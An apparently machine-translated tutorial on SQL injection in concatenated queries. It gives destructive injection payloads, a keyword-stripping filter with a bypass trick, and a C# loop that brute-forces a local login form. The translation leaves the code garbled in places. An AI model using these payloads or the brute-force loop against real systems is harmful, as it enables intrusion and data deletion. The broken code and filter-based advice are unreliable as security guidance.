If this method of SQL injection occurs, it must be the SQL concatenation used in the program, and the user's input form parameters are not filtered or url parameters are not filtered.
There are basically two ways to splice SQL statements:
1, such as SQL = "select * from table where id =" + input parameter; format
This is the best precaution. You only need to verify the number of input parameters. If you ignore the verification here, the consequence is the most serious. Even if you filter the parameters in single quotes, filter the equal signs, and filter the SQL keywords, it is useless.
Without digit verification, the SQL statement may become
Select * from table where id = 10 delete from table
Serious, but I may have filtered out keywords.
Public static string safesql (string str)
{
If (string. isnullorempty (str ))
{
Str = "";
Return str;
}
Else
{
Str. replace ("'","");
}
Str = new regex ("exec", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("xp_mongoshell", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("select", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("insert", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("update", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("delete", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("drop", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("create", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("rename", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("truncate", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("alter", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("exists", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("master.", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("restore", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("=", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("or", regexoptions. ignorecase). replace (str ,"");
Str = new regex ("and", regexoptions. ignorecase). replace (str ,"");
Return str;
}
It is case-insensitive, but what if my input parameter is 10 delandete from table ??
Haha, the method is used. Because it filters out and in delandete and becomes delete again.
But how do hackers know the filtering order? The most common and useful method for hackers is to try it. You don't need to try it several times.
This method can also be used in the following ways:
2. Splicing with single quotes
SQL = "select * from table where name = '" + parameter + "'Order by id desc"
SQL = "select * from table where name = '%" + parameter + "% '"
The input parameter is feng'delete from table select 1 from table where 1 = '1
Use single quotation marks to end the range of the single quotation marks. Add your own statements and splice them later.
For such injection, to insert your own SQL statement, you must add a single quotation mark to end the range of the previous single quotation marks, so it has its own dead point, you only need to filter out single quotes.
There is a more absolute way to replace the single quotation marks entered by the user with two, so that the input statements do not have an execution environment and it feels safer.
SQL injection is so simple that it creates a very serious external environment, so we should have our own protection measures
The following is a brute force password cracking code.
Brute-force cracking: one by one try until the correct password is obtained.
Webclient web = new webclient ();
Web. encoding = encoding. utf8;
For (int I = 0; I <399; I ++)
{
String s = web. downloadstring ("http: // localhost: 2118/website5/default. asp tutorial x? _ Viewstate = % 2fwepdwukmtyznzq1ndcxn2rkg804yc5o9vry7xclcoo1% 2 fuinvau % 3d & txtname = admin & txtpass = "+ I. tostring () + "& button1 = % e7 % 99% bb % e9 % 99% 86 & __ eventvalidation = % validate ");
If (s. contains ("login successful "))
{
Console. writeline ("password cracked successfully: password:" + I. tostring ());
Break;
}
}
Console. readkey ();